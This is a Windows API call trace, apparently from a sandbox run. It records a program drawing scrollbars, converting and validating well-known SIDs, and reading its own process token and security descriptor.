[0130.269] FlatSB_SetScrollProp (param_1=0xb00ea, index=0x100, newValue=0x0, param_4=0) returned 0
[0130.269] GetSysColor (nIndex=20) returned 0xffffff
[0130.269] FlatSB_SetScrollProp (param_1=0xb00ea, index=0x40, newValue=0xffffff, param_4=0) returned 0
[0130.269] FlatSB_SetScrollInfo (param_1=0xb00ea, code=1, psi=0x6f48a, fRedraw=1) returned 0
[0130.269] GetWindowLongA (hWnd=0xb00ea, nIndex=-16) returned 116326400
[0130.269] IsIconic (hWnd=0xb00ea) returned 0
[0130.269] GetClientRect (in: hWnd=0xb00ea, lpRect=0x6f44c | out: lpRect=0x6f44c) returned 1
[0130.269] GetWindowLongA (hWnd=0xb00ea, nIndex=-16) returned 116326400
[0130.269] GetWindowLongA (hWnd=0xb00ea, nIndex=-16) returned 116326400
[0130.269] IsIconic (hWnd=0xb00ea) returned 0
[0130.269] GetClientRect (in: hWnd=0xb00ea, lpRect=0x6f47c | out: lpRect=0x6f47c) returned 1
[0130.269] GetWindowLongA (hWnd=0xb00ea, nIndex=-16) returned 116326400
[0130.269] GetWindowLongA (hWnd=0xb00ea, nIndex=-16) returned 116326400
[0130.269] IsIconic (hWnd=0xb00ea) returned 0
[0130.269] GetClientRect (in: hWnd=0xb00ea, lpRect=0x6f44c | out: lpRect=0x6f44c) returned 1
[0130.269] GetWindowLongA (hWnd=0xb00ea, nIndex=-16) returned 116326400
[0130.269] GetWindowLongA (hWnd=0xb00ea, nIndex=-16) returned 116326400
[0130.270] IsIconic (hWnd=0xb00ea) returned 0
[0130.270] GetClientRect (in: hWnd=0xb00ea, lpRect=0x6f44c | out: lpRect=0x6f44c) returned 1
[0130.270] FlatSB_SetScrollProp (param_1=0xb00ea, index=0x200, newValue=0x0, param_4=0) returned 0
[0130.270] GetSysColor (nIndex=20) returned 0xffffff
[0130.270] FlatSB_SetScrollProp (param_1=0xb00ea, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0130.270] FlatSB_SetScrollInfo (param_1=0xb00ea, code=0, psi=0x6f48a, fRedraw=1) returned 0
[0130.270] GetWindowLongA (hWnd=0xb00ea, nIndex=-16) returned 116326400
[0130.270] IsIconic (hWnd=0xb00ea) returned 0
[0130.270] GetClientRect (in: hWnd=0xb00ea, lpRect=0x6f44c | out: lpRect=0x6f44c) returned 1
[0130.270] GetWindowLongA (hWnd=0xb00ea, nIndex=-16) returned 116326400
[0130.270] IsIconic (hWnd=0xb00ea) returned 0
[0130.270] GetClientRect (in: hWnd=0xb00ea, lpRect=0x6f44c | out: lpRect=0x6f44c) returned 1
[0130.270] GetWindowLongA (hWnd=0xb00ea, nIndex=-16) returned 116326400
[0130.270] IsIconic (hWnd=0xb00ea) returned 0
[0130.270] GetClientRect (in: hWnd=0xb00ea, lpRect=0x6f44c | out: lpRect=0x6f44c) returned 1
[0130.270] FlatSB_SetScrollProp (param_1=0xb00ea, index=0x100, newValue=0x0, param_4=0) returned 0
[0130.270] GetSysColor (nIndex=20) returned 0xffffff
[0130.270] FlatSB_SetScrollProp (param_1=0xb00ea, index=0x40, newValue=0xffffff, param_4=0) returned 0
[0130.270] FlatSB_SetScrollInfo (param_1=0xb00ea, code=1, psi=0x6f48a, fRedraw=1) returned 0
[0130.270] GetWindowLongA (hWnd=0xb00ea, nIndex=-16) returned 116326400
[0130.270] IsIconic (hWnd=0xb00ea) returned 0
[0130.270] GetClientRect (in: hWnd=0xb00ea, lpRect=0x6f44c | out: lpRect=0x6f44c) returned 1
[0130.270] GetCurrentThreadId () returned 0x860
[0130.271] ConvertSidToStringSidA () returned 0x1
[0130.271] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0130.271] GetProcAddress (hModule=0x75370000, lpProcName="LocalFree") returned 0x753bca64
[0130.271] LocalFree (hMem=0x286f40) returned 0x0
[0130.271] LocalFree (hMem=0x272f90) returned 0x0
[0130.271] ConvertStringSidToSidA () returned 0x1
[0130.271] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2932914, pSourceSid=0x272f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2932914*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0130.271] IsValidSid (pSid=0x2932914*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0130.271] ConvertSidToStringSidA () returned 0x1
[0130.271] LocalFree (hMem=0x286f40) returned 0x0
[0130.271] LocalFree (hMem=0x272f90) returned 0x0
[0130.271] ConvertStringSidToSidA () returned 0x1
[0130.271] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x293702c, pSourceSid=0x272f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x293702c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0130.271] IsValidSid (pSid=0x293702c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0130.271] ConvertSidToStringSidA () returned 0x1
[0130.271] LocalFree (hMem=0x286f40) returned 0x0
[0130.271] LocalFree (hMem=0x272f90) returned 0x0
[0130.271] ConvertStringSidToSidA () returned 0x1
[0130.271] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x293f5a0, pSourceSid=0x272f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x293f5a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0130.271] IsValidSid (pSid=0x293f5a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0130.271] ConvertSidToStringSidA () returned 0x1
[0130.271] LocalFree (hMem=0x286f40) returned 0x0
[0130.271] LocalFree (hMem=0x272f90) returned 0x0
[0130.271] ConvertStringSidToSidA () returned 0x1
[0130.271] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x293f614, pSourceSid=0x286f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: pDestinationSid=0x293f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0130.271] IsValidSid (pSid=0x293f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0130.272] ConvertSidToStringSidA () returned 0x1
[0130.272] LocalFree (hMem=0x286f58) returned 0x0
[0130.272] LocalFree (hMem=0x286f40) returned 0x0
[0130.272] ConvertStringSidToSidA () returned 0x1
[0130.272] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x293f688, pSourceSid=0x286f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe) | out: pDestinationSid=0x293f688*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe)) returned 1
[0130.272] IsValidSid (pSid=0x293f688*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe)) returned 1
[0130.272] ConvertSidToStringSidA () returned 0x1
[0130.272] LocalFree (hMem=0x286f58) returned 0x0
[0130.272] LocalFree (hMem=0x286f40) returned 0x0
[0130.272] ConvertStringSidToSidA () returned 0x1
[0130.272] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x293f6fc, pSourceSid=0x286f58*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0) | out: pDestinationSid=0x293f6fc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0)) returned 1
[0130.272] IsValidSid (pSid=0x293f6fc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0)) returned 1
[0130.272] ConvertSidToStringSidA () returned 0x1
[0130.272] LocalFree (hMem=0x27c1c8) returned 0x0
[0130.272] LocalFree (hMem=0x286f58) returned 0x0
[0130.272] ConvertStringSidToSidA () returned 0x1
[0130.272] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x293f770, pSourceSid=0x286f70*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0) | out: pDestinationSid=0x293f770*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1
[0130.272] IsValidSid (pSid=0x293f770*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1
[0130.272] ConvertSidToStringSidA () returned 0x1
[0130.272] LocalFree (hMem=0x27c1c8) returned 0x0
[0130.272] LocalFree (hMem=0x286f70) returned 0x0
[0130.272] ConvertStringSidToSidA () returned 0x1
[0130.272] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x293f7f8, pSourceSid=0x286f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0) | out: pDestinationSid=0x293f7f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0)) returned 1
[0130.272] IsValidSid (pSid=0x293f7f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0)) returned 1
[0130.272] ConvertSidToStringSidA () returned 0x1
[0130.272] LocalFree (hMem=0x27c1c8) returned 0x0
[0130.272] LocalFree (hMem=0x286f40) returned 0x0
[0130.272] ConvertStringSidToSidA () returned 0x1
[0130.272] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x293f880, pSourceSid=0x286f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14) | out: pDestinationSid=0x293f880*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14)) returned 1
[0130.272] IsValidSid (pSid=0x293f880*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14)) returned 1
[0130.272] ConvertSidToStringSidA () returned 0x1
[0130.272] LocalFree (hMem=0x286f58) returned 0x0
[0130.272] LocalFree (hMem=0x286f40) returned 0x0
[0130.272] ConvertStringSidToSidA () returned 0x1
[0130.273] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x293f90c, pSourceSid=0x286f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13) | out: pDestinationSid=0x293f90c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13)) returned 1
[0130.273] IsValidSid (pSid=0x293f90c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13)) returned 1
[0130.273] ConvertSidToStringSidA () returned 0x1
[0130.273] LocalFree (hMem=0x286f58) returned 0x0
[0130.273] LocalFree (hMem=0x286f40) returned 0x0
[0130.273] ConvertStringSidToSidA () returned 0x1
[0130.273] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x293f998, pSourceSid=0x286f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa) | out: pDestinationSid=0x293f998*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa)) returned 1
[0130.273] IsValidSid (pSid=0x293f998*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa)) returned 1
[0130.273] ConvertSidToStringSidA () returned 0x1
[0130.273] LocalFree (hMem=0x286f58) returned 0x0
[0130.273] LocalFree (hMem=0x286f40) returned 0x0
[0130.273] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0130.273] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentThread") returned 0x753c3351
[0130.273] GetCurrentThread () returned 0xfffffffe
[0130.273] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0130.273] GetProcAddress (hModule=0x76da0000, lpProcName="OpenThreadToken") returned 0x76db432c
[0130.273] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0xf01ff, OpenAsSelf=1, TokenHandle=0x6ed0c | out: TokenHandle=0x6ed0c*=0x2813756) returned 0
[0130.273] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0130.273] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentProcess") returned 0x753bcdcf
[0130.274] GetCurrentProcess () returned 0xffffffff
[0130.274] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0130.274] GetProcAddress (hModule=0x76da0000, lpProcName="OpenProcessToken") returned 0x76db4304
[0130.274] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0xf01ff, TokenHandle=0x293fa3c | out: TokenHandle=0x293fa3c*=0x1d0) returned 1
[0130.274] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0130.274] GetProcAddress (hModule=0x76da0000, lpProcName="MapGenericMask") returned 0x76dc7a73
[0130.274] MapGenericMask (in: AccessMask=0x6eb84, GenericMapping=0x6eb88 | out: AccessMask=0x6eb84)
[0130.274] MapGenericMask (in: AccessMask=0x6ecb8, GenericMapping=0x6ecbc | out: AccessMask=0x6ecb8)
[0130.274] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0130.274] GetProcAddress (hModule=0x76da0000, lpProcName="GetTokenInformation") returned 0x76db431c
[0130.274] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x6eccc | out: TokenInformation=0x0, ReturnLength=0x6eccc) returned 0
[0130.274] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0130.275] GetProcAddress (hModule=0x75370000, lpProcName="GetLastError") returned 0x753bbf00
[0130.275] GetLastError () returned 0x7a
[0130.275] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0130.275] GetProcAddress (hModule=0x75370000, lpProcName="HeapAlloc") returned 0x76f72dd6
[0130.275] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x280780, TokenInformationLength=0x24, ReturnLength=0x6ecf0 | out: TokenInformation=0x280780, ReturnLength=0x6ecf0) returned 1
[0130.275] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x293fab0, pSourceSid=0x280788*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)) | out: pDestinationSid=0x293fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0130.275] IsValidSid (pSid=0x293fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0130.275] ConvertSidToStringSidA () returned 0x1
[0130.275] LocalFree (hMem=0x279e80) returned 0x0
[0130.275] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0130.275] GetProcAddress (hModule=0x75370000, lpProcName="HeapFree") returned 0x753bbbd0
[0130.275] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x293fb34, pSourceSid=0x293fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)) | out: pDestinationSid=0x293fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0130.275] IsValidSid (pSid=0x293fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0130.275] ConvertSidToStringSidA () returned 0x1
[0130.275] LocalFree (hMem=0x279e80) returned 0x0
[0130.275] IsValidSid (pSid=0x293fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0130.275] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0130.276] GetProcAddress (hModule=0x75370000, lpProcName="CloseHandle") returned 0x753bca7c
[0130.276] CloseHandle (hObject=0x1d0) returned 1
[0130.276] ConvertStringSidToSidA () returned 0x1
[0130.276] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x293fa54, pSourceSid=0x286f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000) | out: pDestinationSid=0x293fa54*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000)) returned 1
[0130.276] IsValidSid (pSid=0x293fa54*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000)) returned 1
[0130.276] ConvertSidToStringSidA () returned 0x1
[0130.276] LocalFree (hMem=0x286f58) returned 0x0
[0130.276] LocalFree (hMem=0x286f40) returned 0x0
[0130.276] ConvertStringSidToSidA () returned 0x1
[0130.276] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x293fae0, pSourceSid=0x286f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000) | out: pDestinationSid=0x293fae0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 1
[0130.276] IsValidSid (pSid=0x293fae0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 1
[0130.276] ConvertSidToStringSidA () returned 0x1
[0130.276] LocalFree (hMem=0x286f58) returned 0x0
[0130.276] LocalFree (hMem=0x286f40) returned 0x0
[0130.276] ConvertStringSidToSidA () returned 0x1
[0130.276] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x293fbfc, pSourceSid=0x286f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000) | out: pDestinationSid=0x293fbfc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 1
[0130.276] IsValidSid (pSid=0x293fbfc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 1
[0130.276] ConvertSidToStringSidA () returned 0x1
[0130.276] LocalFree (hMem=0x286f58) returned 0x0
[0130.276] LocalFree (hMem=0x286f40) returned 0x0
[0130.276] ConvertStringSidToSidA () returned 0x1
[0130.276] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x293fc8c, pSourceSid=0x286f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000) | out: pDestinationSid=0x293fc8c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 1
[0130.276] IsValidSid (pSid=0x293fc8c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 1
[0130.276] ConvertSidToStringSidA () returned 0x1
[0130.276] LocalFree (hMem=0x286f58) returned 0x0
[0130.276] LocalFree (hMem=0x286f40) returned 0x0
[0130.276] ConvertStringSidToSidA () returned 0x1
[0130.276] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x293fd1c, pSourceSid=0x286f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000) | out: pDestinationSid=0x293fd1c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000)) returned 1
[0130.276] IsValidSid (pSid=0x293fd1c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000)) returned 1
[0130.276] ConvertSidToStringSidA () returned 0x1
[0130.276] LocalFree (hMem=0x286f58) returned 0x0
[0130.276] LocalFree (hMem=0x286f40) returned 0x0
[0130.276] GetCurrentProcessId () returned 0x854
[0130.276] OpenProcess (dwDesiredAccess=0x60000, bInheritHandle=0, dwProcessId=0x854) returned 0x1d0
[0130.277] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0130.277] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityInfo") returned 0x76dab3e4
[0130.277] GetSecurityInfo () returned 0x0
[0130.279] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0130.280] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorControl") returned 0x76daaddf
[0130.280] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x280f28, pControl=0x6ea92, lpdwRevision=0x6ea8c | out: pControl=0x6ea92, lpdwRevision=0x6ea8c) returned 1
[0130.280] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0130.280] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorOwner") returned 0x76daadf7
[0130.280] GetSecurityDescriptorOwner (in: pSecurityDescriptor=0x280f28, pOwner=0x6ea88, lpbOwnerDefaulted=0x6ea7c | out: pOwner=0x6ea88*=0x0, lpbOwnerDefaulted=0x6ea7c) returned 1
[0130.280] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0130.280] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorGroup") returned 0x76daae27
[0130.280] GetSecurityDescriptorGroup (in: pSecurityDescriptor=0x280f28, pGroup=0x6ea88, lpbGroupDefaulted=0x6ea7c | out: pGroup=0x6ea88*=0x0, lpbGroupDefaulted=0x6ea7c) returned 1
[0130.280] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0130.280] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorDacl") returned 0x76db41a6
[0130.280] GetSecurityDescriptorDacl (in: pSecurityDescriptor=0x280f28, lpbDaclPresent=0x6ea80, pDacl=0x6ea74, lpbDaclDefaulted=0x6ea7c | out: lpbDaclPresent=0x6ea80, pDacl=0x6ea74, lpbDaclDefaulted=0x6ea7c) returned 1
[0130.281] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0130.281] GetProcAddress (hModule=0x76da0000, lpProcName="IsValidAcl") returned 0x76da8523
[0130.281] IsValidAcl (pAcl=0x280f3c) returned 1
[0130.281] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0130.281] GetProcAddress (hModule=0x76da0000, lpProcName="GetAce") returned 0x76db45f0
[0130.281] GetAce (in: pAcl=0x280f3c, dwAceIndex=0x0, pAce=0x6e914 | out: pAce=0x6e914*=0x280f44) returned 1
[0130.281] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x293fe74, pSourceSid=0x280f4c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x293fe74*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0130.281] IsValidSid (pSid=0x293fe74*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0130.281] ConvertSidToStringSidA () returned 0x1
[0130.281] LocalFree (hMem=0x287018) returned 0x0
[0130.281] GetAce (in: pAcl=0x280f3c, dwAceIndex=0x1, pAce=0x6e914 | out: pAce=0x6e914*=0x280f5c) returned 1
